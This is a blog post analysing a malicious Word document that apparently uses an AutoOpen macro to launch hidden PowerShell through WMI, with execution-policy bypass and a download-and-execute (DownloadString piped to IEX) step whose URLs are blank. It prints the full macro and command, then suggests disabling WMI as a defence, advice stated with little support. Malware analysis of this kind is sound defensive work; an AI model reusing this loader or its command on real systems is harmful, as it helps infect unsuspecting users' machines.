Fileless malware and WMI

Hello and welcome back. After a few weeks I managed to find time and write a new blog post. Someone suggested an article about fileless malware and here it is.

The thing with fileless malware if that it runs completely in memory (if the name wasn’t obvious enough), thus it can evade security software that inspects disk writes and forensic evidences must be gathered from memory (or Windows registries).

Since persistence is an important aspect of malware, this kind of threat usually ensures it by writing an autorun registry key with a command that will spawn a script using powershell, wscript or even mshta (but this will be a topic for another day).

The infection vectors can be any document or even a web page with a malicious javascript, but the major functionality will run in memory. The example of today’s post is a Word document:

  • b69256cf0660688bcbb808e90cb957a47bf9033706dc27828fe83b03140ba3bb

office document screenshot

Typical social engineering for malicious documents, fooling the trusty user into enabling macros even though the enable button is under a “SECURITY WARNING”.

To view the macro script press ALT+F11 or just find the View Tab -> Macros -> View Macros menu.

Sub AutoOpen()
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    x1 = "Download"
    x2 = "String"
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")

    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient)." & x1 & x2 & "('') | iex } else {(new-object Net.WebClient)." & x1 & x2 & "('') | iex}", Null, objConfig, intProcessID
End Sub

If you read the code of the macro closely, you’ll see an object is created from “winmgmts” which is the WMI service within the Windows OS. WMI stands for “Windows Management Instrumentation”, it’s a technology that allows for automation of tasks and management of objects within the OS. According to Microsoft,  WMI was implemented in Windows 95 and NT 4.0, so it’s pretty darn old. This technology is fairly popular among network admins, but in the last years it has “won the heart” of malware developers.

After creating that object, it continues by calling some APIs responsible for creating a new process in the OS with a hidden window (“Win32_ProcessStartup“, “SpawnInstance_“) and then passes a powershell script as an argument to that last “Create” method.


powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('') | iex } else {(new-object Net.WebClient).DownloadString('') | iex}

The powershell script is pretty obvious, it downloads another PS and executes it using the IEX (Invoke-Expression) command. At the time of me writing this post, those links point to nothing, but we could have find anything imaginable in them (from Mimikatz, bankers, reverse shells, and maybe even code injection into other processes)

Running the macros and viewing the havoc in Process Monitor , we’ll see a new Powershell process spawned not under MS Word, but under “svchost.exe -> vmiprvse.exe”.

Process monitor tree view of processes

This is a simple, yet efficient technique to install malware in an unsuspecting user’s machine, but it can easily be prevented. If you didn’t know what WMI is, I bet you don’t even need it so why not disable it from the Windows Services?

I’m not aware of any issues in the OS if WMI is disabled so let’s do it.


Now, after WMI is disabled, running the macros from that word document will throw an error and the infection will fail.

macros error

For the next post I’ll try and find a more interesting sample, with persistence and maybe even a JS from a webpage.

C yea!

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s